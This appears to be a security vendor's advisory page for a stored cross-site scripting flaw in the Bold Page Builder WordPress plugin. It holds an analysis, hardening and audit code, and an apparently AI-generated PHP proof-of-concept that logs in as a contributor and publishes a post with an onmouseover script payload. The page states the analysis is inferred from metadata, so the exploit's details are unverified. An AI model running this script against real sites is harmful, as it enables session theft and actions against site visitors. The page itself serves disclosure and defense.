Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-12159: Bold Page Builder <= 5.4.8 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode (bold-page-builder)

Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 5.4.8
Patched Version
Disclosed February 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-12159 (metadata-based):
This vulnerability is an authenticated Stored Cross-Site Scripting (XSS) flaw in the Bold Page Builder WordPress plugin, affecting versions up to and including 5.4.8. The vulnerability resides in the plugin’s `bt_bb_raw_content` shortcode handler. Attackers with contributor-level or higher privileges can inject malicious scripts into page content, which then execute for any user viewing the compromised page. The CVSS score of 6.4 reflects a medium severity issue with scope change, indicating the attack can impact users beyond the targeted component.

Atomic Edge research indicates the root cause is insufficient input sanitization and output escaping on user-supplied shortcode attributes. The CWE-79 classification (Improper Neutralization of Input During Web Page Generation) confirms this is a classic web page generation flaw. The vulnerability description explicitly names the `bt_bb_raw_content` shortcode as the vulnerable component. Without access to the source code diff, Atomic Edge analysis infers the plugin likely fails to properly sanitize attribute values before storing them in the database and/or fails to escape them when rendering the shortcode output on the front end. This inference is based on the CWE pattern and the specific mention of user-supplied attributes in the description.

Exploitation requires an authenticated user with at least the ‘contributor’ role. The attacker would create or edit a post or page, inserting the vulnerable shortcode with a malicious payload in one of its attributes. For example, they might use the WordPress editor to add `[bt_bb_raw_content custom_attribute="alert(document.domain)"]`. When the page is saved and subsequently viewed by any user, the embedded JavaScript executes in the victim’s browser. The attack vector is the WordPress post editor interface where shortcodes are processed.

Effective remediation requires implementing proper input validation and output escaping. The plugin should sanitize all user-provided shortcode attribute values before storage, using functions like `sanitize_text_field()`. Additionally, the plugin must escape any dynamic output when rendering the shortcode on the front end, using functions like `esc_attr()` for attributes and `wp_kses_post()` for content. A patch would need to apply these security measures to the `bt_bb_raw_content` shortcode callback function.
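As an added illustration, not Bold Page Builder's own code and not the vendor's patch (no diff is shown on this page), the example below applies the remediation just described to a shortcode callback: attributes are whitelisted and sanitized on input, each value is escaped for the context it lands in, and enclosed content passes through `wp_kses_post()`. The function names, the accepted attribute names (`custom_attribute`, `el_class`) and the output markup are assumptions. A second function audits stored post content for instances of the shortcode carrying attributes outside the accepted list, which is a useful check when reviewing existing content after updating.

```php
<?php
// Added example, not the plugin's code. Function names, attribute names and
// markup are assumptions made for illustration.

// Input side: accept only the attributes we know about and sanitize each value.
function example_bt_bb_raw_content_atts( array $atts ): array {
    // shortcode_atts() drops any attribute not listed in the defaults, so an
    // unexpected key (for example an event-handler name) never reaches output.
    $atts = shortcode_atts(
        [
            'custom_attribute' => '',
            'el_class'         => '',
        ],
        $atts,
        'bt_bb_raw_content'
    );

    // sanitize_text_field() strips tags, invalid octets and line breaks.
    return array_map( 'sanitize_text_field', $atts );
}

// Output side: escape every dynamic value for the context it is placed in.
function example_bt_bb_raw_content_render( array $atts, ?string $content = null ): string {
    $atts = example_bt_bb_raw_content_atts( $atts );

    // Nested shortcodes are still expanded, then the result is filtered through
    // wp_kses_post(), which keeps post-safe HTML and removes <script> tags and
    // on* event-handler attributes.
    $inner = wp_kses_post( do_shortcode( (string) $content ) );

    return sprintf(
        '<div class="bt_bb_raw_content %s" data-custom="%s">%s</div>',
        esc_attr( $atts['el_class'] ),         // HTML attribute context
        esc_attr( $atts['custom_attribute'] ), // HTML attribute context
        $inner                                 // HTML body context, already filtered
    );
}

// Registered here only to show the hook; in practice the change belongs in the
// plugin's own callback rather than in a separate file.
add_shortcode( 'bt_bb_raw_content', 'example_bt_bb_raw_content_render' );

// Defender-side check: return every bt_bb_raw_content instance in a piece of
// post content whose attributes fall outside the accepted list. Run it over
// post_content pulled from the database when auditing existing pages.
function example_audit_raw_content_shortcodes(
    string $post_content,
    array $allowed = [ 'custom_attribute', 'el_class' ]
): array {
    $findings = [];
    // get_shortcode_regex() accepts a list of tag names to restrict the match.
    $regex = '/' . get_shortcode_regex( [ 'bt_bb_raw_content' ] ) . '/s';

    if ( preg_match_all( $regex, $post_content, $matches, PREG_SET_ORDER ) ) {
        foreach ( $matches as $m ) {
            // Group 3 of the shortcode regex is the raw attribute string.
            $parsed = shortcode_parse_atts( $m[3] );
            if ( ! is_array( $parsed ) ) {
                continue;
            }
            $unexpected = array_diff( array_keys( $parsed ), $allowed );
            if ( $unexpected ) {
                $findings[] = [
                    'shortcode'  => $m[0],
                    'unexpected' => array_values( $unexpected ),
                ];
            }
        }
    }

    return $findings;
}
```

The audit function is deliberately conservative: it flags any attribute name the callback does not recognise rather than trying to recognise payloads, since the whitelist is the property the hardened callback actually enforces.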

Successful exploitation leads to stored XSS attacks. An attacker can steal session cookies, perform actions on behalf of authenticated users, deface websites, or redirect visitors to malicious sites. The ‘contributor’ access requirement limits immediate exploitation to trusted users, but this role is often granted to less-vetted individuals. The scope change (S:C in CVSS) means the injected script executes in the context of the vulnerable page, potentially affecting all site visitors and escalating the impact beyond a single user’s session.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-12159 - Bold Page Builder <= 5.4.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
/**
 * Proof of Concept for CVE-2025-12159.
 * This script simulates an authenticated contributor injecting a malicious shortcode into a post.
 * Assumptions:
 * 1. The target site has the Bold Page Builder plugin (<=5.4.8) active.
 * 2. We have valid contributor-level credentials.
 * 3. The site uses the standard WordPress login and post editing endpoints.
 * 4. The `bt_bb_raw_content` shortcode accepts and unsafely outputs a 'custom_attribute'.
 */

$target_url = 'https://example.com'; // CHANGE THIS
$username = 'contributor_user';      // CHANGE THIS
$password = 'contributor_pass';      // CHANGE THIS

// Payload: XSS via a shortcode attribute.
$malicious_shortcode = '[bt_bb_raw_content custom_attribute="" onmouseover="alert(document.domain)" data-bt-bb=""]';
$post_title = 'Test Post with XSS';
$post_content = 'This post contains a malicious shortcode. ' . $malicious_shortcode;

// Initialize cURL session for cookie persistence
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only

// Step 1: Authenticate and retrieve the nonce for creating a post.
$login_url = $target_url . '/wp-login.php';
$login_fields = http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]);
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $login_fields);
$response = curl_exec($ch);

// Check for login success by looking for the admin dashboard.
if (strpos($response, 'Dashboard') === false) {
    die('Login failed. Check credentials.');
}

// Step 2: Get a nonce for the 'post' action from the admin area.
// Contributor users access /wp-admin/post-new.php.
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract the nonce for creating a post. This regex is a common pattern.
preg_match('/"_wpnonce" value="([a-f0-9]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';
if (empty($nonce)) {
    die('Could not retrieve nonce for post creation.');
}

// Step 3: Create a new post with the malicious shortcode.
$create_post_url = $target_url . '/wp-admin/post-new.php';
$post_fields = [
    'post_title' => $post_title,
    'content' => $post_content,
    'publish' => 'Publish',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => '/wp-admin/post-new.php',
    'post_type' => 'post',
    'post_status' => 'publish'
];
curl_setopt($ch, CURLOPT_URL, $create_post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
$response = curl_exec($ch);

// Check for success.
if (strpos($response, 'Post published') !== false || strpos($response, 'Post updated') !== false) {
    echo "Potential exploit successful. A post containing the malicious shortcode was published.\n";
    echo "Visit the post on the front end and hover over the shortcode output to trigger the XSS.\n";
} else {
    echo "Post creation may have failed. Check user permissions (contributor posts require review).\n";
}

curl_close($ch);
?>
